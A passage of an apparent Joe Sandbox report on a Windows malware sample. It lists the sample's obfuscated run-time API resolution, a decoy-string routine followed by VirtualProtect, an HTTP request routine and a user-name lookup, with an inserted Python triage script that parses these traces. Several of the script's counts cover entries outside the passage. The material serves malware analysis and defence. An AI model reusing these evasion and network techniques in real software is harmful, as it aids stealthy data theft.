                                            • GetProcAddress.KERNEL32(74DD0000,009CFDF0), ref: 0041A154
                                            • GetProcAddress.KERNEL32(74DD0000,009C60D8), ref: 0041A16D
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD48), ref: 0041A185
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE80), ref: 0041A19D
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD18), ref: 0041A1B6
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD60), ref: 0041A1CE
                                            • GetProcAddress.KERNEL32(74DD0000,009CFBF8), ref: 0041A1E6
                                            • GetProcAddress.KERNEL32(74DD0000,009CFC58), ref: 0041A1FF
                                            • GetProcAddress.KERNEL32(74DD0000,009CFCB8), ref: 0041A217
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE38), ref: 0041A22F
                                            • GetProcAddress.KERNEL32(74DD0000,009CFE98), ref: 0041A248
                                            • GetProcAddress.KERNEL32(74DD0000,009CBBE8), ref: 0041A260
                                            • GetProcAddress.KERNEL32(74DD0000,009CFC88), ref: 0041A278
                                            • GetProcAddress.KERNEL32(74DD0000,009CFEB0), ref: 0041A291
                                            • GetProcAddress.KERNEL32(74DD0000,009C6318), ref: 0041A2A9
                                            • GetProcAddress.KERNEL32(74DD0000,009CFEC8), ref: 0041A2C1
                                            • GetProcAddress.KERNEL32(74DD0000,009C6338), ref: 0041A2DA
                                            • GetProcAddress.KERNEL32(74DD0000,009CFD90), ref: 0041A2F2
                                            • GetProcAddress.KERNEL32(74DD0000,009CFCE8), ref: 0041A30A
                                            • GetProcAddress.KERNEL32(74DD0000,009C5ED8), ref: 0041A323
                                            • GetProcAddress.KERNEL32(74DD0000,009C6018), ref: 0041A33B
                                            • LoadLibraryA.KERNEL32(009CFDA8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                            • LoadLibraryA.KERNEL32(009CFD78,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                            • LoadLibraryA.KERNEL32(009CFDC0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                            • LoadLibraryA.KERNEL32(009CFEE0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                            • LoadLibraryA.KERNEL32(009CFE08,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                            • LoadLibraryA.KERNEL32(009CFE50,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                            • LoadLibraryA.KERNEL32(009CFC28,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                            • LoadLibraryA.KERNEL32(009CFCD0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                            • GetProcAddress.KERNEL32(75290000,009C5F78), ref: 0041A3EA
                                            • GetProcAddress.KERNEL32(75290000,009CFE68), ref: 0041A402
                                            • GetProcAddress.KERNEL32(75290000,009C94F0), ref: 0041A41A
                                            • GetProcAddress.KERNEL32(75290000,009CFC10), ref: 0041A433
                                            • GetProcAddress.KERNEL32(75290000,009C5E58), ref: 0041A44B
                                            • GetProcAddress.KERNEL32(73B40000,009CBEE0), ref: 0041A470
                                            • GetProcAddress.KERNEL32(73B40000,009C5E78), ref: 0041A489
                                            • GetProcAddress.KERNEL32(73B40000,009CBE40), ref: 0041A4A1
                                            • GetProcAddress.KERNEL32(73B40000,009CFD00), ref: 0041A4B9
                                            • GetProcAddress.KERNEL32(73B40000,009CFC40), ref: 0041A4D2
                                            • GetProcAddress.KERNEL32(73B40000,009C5FF8), ref: 0041A4EA
                                            • GetProcAddress.KERNEL32(73B40000,009C5DD8), ref: 0041A502
                                            • GetProcAddress.KERNEL32(73B40000,009CFC70), ref: 0041A51B
                                            • GetProcAddress.KERNEL32(752C0000,009C5EF8), ref: 0041A53C
                                            • GetProcAddress.KERNEL32(752C0000,009C5FB8), ref: 0041A554
                                            • GetProcAddress.KERNEL32(752C0000,009CFCA0), ref: 0041A56D
                                            • GetProcAddress.KERNEL32(752C0000,009CFD30), ref: 0041A585
                                            • GetProcAddress.KERNEL32(752C0000,009C5EB8), ref: 0041A59D
                                            • GetProcAddress.KERNEL32(74EC0000,009CBF80), ref: 0041A5C3
                                            • GetProcAddress.KERNEL32(74EC0000,009CBE68), ref: 0041A5DB
                                            • GetProcAddress.KERNEL32(74EC0000,009CFF40), ref: 0041A5F3
                                            • GetProcAddress.KERNEL32(74EC0000,009C5F18), ref: 0041A60C
                                            • GetProcAddress.KERNEL32(74EC0000,009C5DF8), ref: 0041A624
                                            • GetProcAddress.KERNEL32(74EC0000,009CBFA8), ref: 0041A63C
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF28), ref: 0041A662
                                            • GetProcAddress.KERNEL32(75BD0000,009C5E18), ref: 0041A67A
                                            • GetProcAddress.KERNEL32(75BD0000,009C9400), ref: 0041A692
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF58), ref: 0041A6AB
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF70), ref: 0041A6C3
                                            • GetProcAddress.KERNEL32(75BD0000,009C5CF8), ref: 0041A6DB
                                            • GetProcAddress.KERNEL32(75BD0000,009C6098), ref: 0041A6F4
                                            • GetProcAddress.KERNEL32(75BD0000,009CFF88), ref: 0041A70C
                                            • GetProcAddress.KERNEL32(75BD0000,009CFEF8), ref: 0041A724
                                            • GetProcAddress.KERNEL32(75A70000,009C5D78), ref: 0041A746
                                            • GetProcAddress.KERNEL32(75A70000,009CFFB8), ref: 0041A75E
                                            • GetProcAddress.KERNEL32(75A70000,009CFFA0), ref: 0041A776
                                            • GetProcAddress.KERNEL32(75A70000,009CFF10), ref: 0041A78F
                                            • GetProcAddress.KERNEL32(75A70000,009D0228), ref: 0041A7A7
                                            • GetProcAddress.KERNEL32(75450000,009C5D18), ref: 0041A7C8
                                            • GetProcAddress.KERNEL32(75450000,009C5E38), ref: 0041A7E1
                                            • GetProcAddress.KERNEL32(75DA0000,009C5F38), ref: 0041A802
                                            • GetProcAddress.KERNEL32(75DA0000,009D0090), ref: 0041A81A
                                            • GetProcAddress.KERNEL32(6F070000,009C6078), ref: 0041A840
                                            • GetProcAddress.KERNEL32(6F070000,009C5FD8), ref: 0041A858
                                            • GetProcAddress.KERNEL32(6F070000,009C5F98), ref: 0041A870
                                            • GetProcAddress.KERNEL32(6F070000,009D0198), ref: 0041A889
                                            • GetProcAddress.KERNEL32(6F070000,009C5E98), ref: 0041A8A1
                                            • GetProcAddress.KERNEL32(6F070000,009C5F58), ref: 0041A8B9
                                            • GetProcAddress.KERNEL32(6F070000,009C6038), ref: 0041A8D2
                                            • GetProcAddress.KERNEL32(6F070000,009C6058), ref: 0041A8EA
                                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
                                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
                                            • GetProcAddress.KERNEL32(75AF0000,009D0270), ref: 0041A939
                                            • GetProcAddress.KERNEL32(75AF0000,009C95A0), ref: 0041A951
                                            • GetProcAddress.KERNEL32(75AF0000,009D0060), ref: 0041A969
                                            • GetProcAddress.KERNEL32(75AF0000,009D01C8), ref: 0041A982
                                            • GetProcAddress.KERNEL32(75D90000,009C60B8), ref: 0041A9A3
                                            • GetProcAddress.KERNEL32(6F9D0000,009D02A0), ref: 0041A9C4
                                            • GetProcAddress.KERNEL32(6F9D0000,009C5CD8), ref: 0041A9DD
                                            • GetProcAddress.KERNEL32(6F9D0000,009D0108), ref: 0041A9F5
                                            • GetProcAddress.KERNEL32(6F9D0000,009D0168), ref: 0041AA0D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: HttpQueryInfoA$InternetSetOptionA
                                            • API String ID: 2238633743-1775429166
                                            • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                            • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                            • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                            • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62
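The APIs list above is the sample's import-resolution routine: every GetProcAddress name argument except two is an 8-digit pointer (009Cxxxx), i.e. a buffer filled at run time rather than a string literal the report could print, which is what the "string decryption" signature refers to. As an added triage helper (this code is not part of the Joe Sandbox report or of the sample; the function and variable names are the editor's own), the Python below parses lines in the report's "APIs" format, groups GetProcAddress calls by module handle, separates plaintext names from run-time-built names, and reports which handles were already in use before the first LoadLibraryA call site. The sample input is six lines copied from the list above; pasting the whole list in gives 104 GetProcAddress calls on 13 distinct handles, 8 LoadLibraryA calls, two plaintext names (InternetSetOptionA and HttpQueryInfoA, both on handle 6F070000), and one handle (74DD0000) used before any LoadLibraryA.

```python
import re

# Sample input: six lines copied verbatim from the "APIs" list of the report
# section above (sandbox output, not constructed data). Any subset of that
# list, or the whole list, can be pasted here instead.
SAMPLE_LINES = """\
• GetProcAddress.KERNEL32(74DD0000,009C63B8), ref: 00419F3D
• GetProcAddress.KERNEL32(74DD0000,009C6478), ref: 00419F55
• LoadLibraryA.KERNEL32(009CFDA8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
• GetProcAddress.KERNEL32(75290000,009C5F78), ref: 0041A3EA
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
"""

# One report line: "<bullet> Api.EXPORTER(arg,arg,...), ref: CALLSITE"
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<exporter>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The sandbox prints pointer arguments as eight hex digits. No Win32 export is
# named that way, so a GetProcAddress name argument of this shape is a buffer
# whose content was produced at run time (decrypted or assembled), not a
# string literal the report could show.
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_api_lines(text):
    """Parse report API lines into dicts; lines of any other shape are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "exporter": m.group("exporter"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def summarize_resolution(calls):
    """Group GetProcAddress calls by module handle and classify each name argument."""
    handles = {}        # module handle -> counters, in first-seen call-site order
    loadlib_refs = []   # call sites of LoadLibraryA
    for c in sorted(calls, key=lambda c: c["ref"]):
        if c["api"] == "LoadLibraryA":
            loadlib_refs.append(c["ref"])
        elif c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            hmod, name = c["args"][0], c["args"][1]
            entry = handles.setdefault(
                hmod, {"count": 0, "runtime_names": 0, "unknown_names": 0, "plaintext_names": []})
            entry["count"] += 1
            if name == "?":                 # the sandbox could not read the argument
                entry["unknown_names"] += 1
            elif HEX32.match(name):         # pointer to a run-time-built name
                entry["runtime_names"] += 1
            else:                           # literal export name visible in the binary
                entry["plaintext_names"].append(name)
    first_loadlib = min(loadlib_refs) if loadlib_refs else None
    # Handles already passed to GetProcAddress at call sites below the first
    # LoadLibraryA call site were not obtained from LoadLibraryA in this function.
    # Call-site order stands in for execution order here; for the function above
    # the control-flow graph confirms that ordering.
    before_loadlib = []
    if first_loadlib is not None:
        for c in calls:
            if c["api"] == "GetProcAddress" and c["ref"] < first_loadlib:
                if c["args"][0] not in before_loadlib:
                    before_loadlib.append(c["args"][0])
    return {
        "getprocaddress_total": sum(e["count"] for e in handles.values()),
        "loadlibrarya_total": len(loadlib_refs),
        "handles": handles,
        "plaintext_names": [n for e in handles.values() for n in e["plaintext_names"]],
        "handles_before_first_loadlibrary": before_loadlib,
    }


if __name__ == "__main__":
    report = summarize_resolution(parse_api_lines(SAMPLE_LINES))
    for hmod, e in report["handles"].items():
        print(f"{hmod}: {e['count']} GetProcAddress, {e['runtime_names']} run-time names, "
              f"plaintext={e['plaintext_names']}")
    print("LoadLibraryA call sites:", report["loadlibrarya_total"])
    print("handles used before the first LoadLibraryA:", report["handles_before_first_loadlibrary"])
```

The per-handle counts map directly onto the blocks of the control-flow graph (43, 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1, 4 GetProcAddress calls), so the same script doubles as a check that the API list and the graph describe the same function. Names that come out as run-time-built are the ones to recover from a memory dump or by hooking GetProcAddress, since the static strings section will not contain them.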

                                            Control-flow Graph

                                            APIs
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                            • strlen.MSVCRT ref: 00404740
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                            Strings
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence is repeated, $-separated, throughout the original field)
                                            • API String ID: 2127927946-2218711628
                                            • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
                                            • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D

                                            Control-flow Graph
                                            • Graph rendering (blocks marked Executed / Not Executed) not recoverable as text; entry block 4048d0-404992, and the block labels show calls to InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile and InternetCloseHandle.
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 0040498A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,009D1EE0), ref: 00404E38
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                            • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                            • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                            • HttpOpenRequestA.WININET(00000000,009D1E40,?,009D1218,00000000,00000000,00400100,00000000), ref: 00404B65
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                            Strings
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID: "$"$------$------$------
                                            • API String ID: 2402878923-2180234286
                                            • Opcode ID: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                            • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                            • Opcode Fuzzy Hash: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                            • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                            Yara matches
                                            Similarity
